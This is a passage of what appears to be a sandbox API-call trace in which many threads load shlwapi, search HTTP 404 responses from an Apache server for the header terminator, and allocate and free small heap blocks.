23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.152] GetProcessHeap () returned 0x6a0000 [0226.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0226.152] GetProcessHeap () returned 0x6a0000 [0226.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0226.152] GetProcessHeap () returned 0x6a0000 [0226.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 290 os_tid = 0x938 [0226.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.514] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.514] GetProcessHeap () returned 0x6a0000 [0226.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0226.515] GetProcessHeap () returned 0x6a0000 [0226.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0226.515] GetProcessHeap () returned 0x6a0000 [0226.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 291 os_tid = 0x1c4 [0226.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.706] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.706] GetProcessHeap () returned 0x6a0000 [0226.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0226.706] GetProcessHeap () returned 0x6a0000 [0226.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0226.707] GetProcessHeap () returned 0x6a0000 [0226.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 292 os_tid = 0x930 [0226.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.907] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.907] GetProcessHeap () returned 0x6a0000 [0226.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0226.907] GetProcessHeap () returned 0x6a0000 [0226.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0226.907] GetProcessHeap () returned 0x6a0000 [0226.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 293 os_tid = 0xec [0227.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.151] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0227.151] GetProcessHeap () returned 0x6a0000 [0227.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0227.151] GetProcessHeap () returned 0x6a0000 [0227.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0227.151] GetProcessHeap () returned 0x6a0000 [0227.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 294 os_tid = 0x374 [0227.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.466] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0227.466] GetProcessHeap () returned 0x6a0000 [0227.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0227.466] GetProcessHeap () returned 0x6a0000 [0227.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0227.466] GetProcessHeap () returned 0x6a0000 [0227.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 295 os_tid = 0xb44 [0227.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.672] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0227.672] GetProcessHeap () returned 0x6a0000 [0227.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0227.672] GetProcessHeap () returned 0x6a0000 [0227.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0227.672] GetProcessHeap () returned 0x6a0000 [0227.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 296 os_tid = 0x13e4 [0227.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.874] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0227.874] GetProcessHeap () returned 0x6a0000 [0227.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0227.874] GetProcessHeap () returned 0x6a0000 [0227.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0227.874] GetProcessHeap () returned 0x6a0000 [0227.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 297 os_tid = 0xab0 [0228.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.077] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.077] GetProcessHeap () returned 0x6a0000 [0228.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0228.077] GetProcessHeap () returned 0x6a0000 [0228.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0228.077] GetProcessHeap () returned 0x6a0000 [0228.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 298 os_tid = 0xfac [0228.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.377] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.377] GetProcessHeap () returned 0x6a0000 [0228.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0228.377] GetProcessHeap () returned 0x6a0000 [0228.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0228.377] GetProcessHeap () returned 0x6a0000 [0228.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 299 os_tid = 0x13e8 [0228.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.669] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.669] GetProcessHeap () returned 0x6a0000 [0228.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0228.669] GetProcessHeap () returned 0x6a0000 [0228.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0228.669] GetProcessHeap () returned 0x6a0000 [0228.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 300 os_tid = 0x1408 [0228.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.883] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.883] GetProcessHeap () returned 0x6a0000 [0228.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0228.883] GetProcessHeap () returned 0x6a0000 [0228.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0228.883] GetProcessHeap () returned 0x6a0000 [0228.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 301 os_tid = 0x140c [0229.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.104] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.104] GetProcessHeap () returned 0x6a0000 [0229.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0229.104] GetProcessHeap () returned 0x6a0000 [0229.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0229.104] GetProcessHeap () returned 0x6a0000 [0229.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 302 os_tid = 0x1410 [0229.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.311] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.311] GetProcessHeap () returned 0x6a0000 [0229.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0229.311] GetProcessHeap () returned 0x6a0000 [0229.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0229.312] GetProcessHeap () returned 0x6a0000 [0229.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 303 os_tid = 0x1414 [0229.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.541] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.541] GetProcessHeap () returned 0x6a0000 [0229.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0229.541] GetProcessHeap () returned 0x6a0000 [0229.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0229.541] GetProcessHeap () returned 0x6a0000 [0229.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 304 os_tid = 0x1418 [0229.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.740] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.741] GetProcessHeap () returned 0x6a0000 [0229.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0229.741] GetProcessHeap () returned 0x6a0000 [0229.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0229.741] GetProcessHeap () returned 0x6a0000 [0229.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 305 os_tid = 0x141c [0229.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.961] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.961] GetProcessHeap () returned 0x6a0000 [0229.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0229.961] GetProcessHeap () returned 0x6a0000 [0229.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0229.961] GetProcessHeap () returned 0x6a0000 [0229.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 306 os_tid = 0x1420 [0230.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.162] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.162] GetProcessHeap () returned 0x6a0000 [0230.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0230.162] GetProcessHeap () returned 0x6a0000 [0230.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0230.162] GetProcessHeap () returned 0x6a0000 [0230.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 307 os_tid = 0x1424 [0230.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.364] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.364] GetProcessHeap () returned 0x6a0000 [0230.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0230.364] GetProcessHeap () returned 0x6a0000 [0230.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0230.364] GetProcessHeap () returned 0x6a0000 [0230.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 308 os_tid = 0x1428 [0230.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.683] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.683] GetProcessHeap () returned 0x6a0000 [0230.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0230.683] GetProcessHeap () returned 0x6a0000 [0230.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0230.683] GetProcessHeap () returned 0x6a0000 [0230.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 309 os_tid = 0x1438 [0230.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.963] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.963] GetProcessHeap () returned 0x6a0000 [0230.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0230.963] GetProcessHeap () returned 0x6a0000 [0230.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0230.963] GetProcessHeap () returned 0x6a0000 [0230.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 310 os_tid = 0x143c [0231.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.156] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.156] GetProcessHeap () returned 0x6a0000 [0231.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0231.156] GetProcessHeap () returned 0x6a0000 [0231.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0231.156] GetProcessHeap () returned 0x6a0000 [0231.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 311 os_tid = 0x1440 [0231.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.484] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.484] GetProcessHeap () returned 0x6a0000 [0231.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0231.484] GetProcessHeap () returned 0x6a0000 [0231.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0231.484] GetProcessHeap () returned 0x6a0000 [0231.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 312 os_tid = 0x1444 [0231.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.689] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.689] GetProcessHeap () returned 0x6a0000 [0231.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0231.689] GetProcessHeap () returned 0x6a0000 [0231.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0231.689] GetProcessHeap () returned 0x6a0000 [0231.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 313 os_tid = 0x1448 [0231.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.973] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.973] GetProcessHeap () returned 0x6a0000 [0231.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be910 [0231.973] GetProcessHeap () returned 0x6a0000 [0231.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be910 | out: hHeap=0x6a0000) returned 1 [0231.973] GetProcessHeap () returned 0x6a0000 [0231.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 314 os_tid = 0x144c [0232.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.183] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.184] GetProcessHeap () returned 0x6a0000 [0232.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be910 [0232.184] GetProcessHeap () returned 0x6a0000 [0232.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be910 | out: hHeap=0x6a0000) returned 1 [0232.184] GetProcessHeap () returned 0x6a0000 [0232.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 315 os_tid = 0x1450 [0232.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.372] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.372] GetProcessHeap () returned 0x6a0000 [0232.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0232.372] GetProcessHeap () returned 0x6a0000 [0232.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0232.373] GetProcessHeap () returned 0x6a0000 [0232.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 316 os_tid = 0x1454 [0232.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.636] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.636] GetProcessHeap () returned 0x6a0000 [0232.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0232.636] GetProcessHeap () returned 0x6a0000 [0232.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0232.636] GetProcessHeap () returned 0x6a0000 [0232.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 317 os_tid = 0x1458 [0232.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.809] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.809] GetProcessHeap () returned 0x6a0000 [0232.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0232.809] GetProcessHeap () returned 0x6a0000 [0232.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0232.810] GetProcessHeap () returned 0x6a0000 [0232.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 Thread: id = 318 os_tid = 0x145c [0232.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.993] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.993] GetProcessHeap () returned 0x6a0000 [0232.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0232.993] GetProcessHeap () returned 0x6a0000 [0232.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0232.993] GetProcessHeap () returned 0x6a0000 [0232.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 Thread: id = 319 os_tid = 0x1460 [0233.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.196] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0233.196] GetProcessHeap () returned 0x6a0000 [0233.196] RtlAllocateHeap 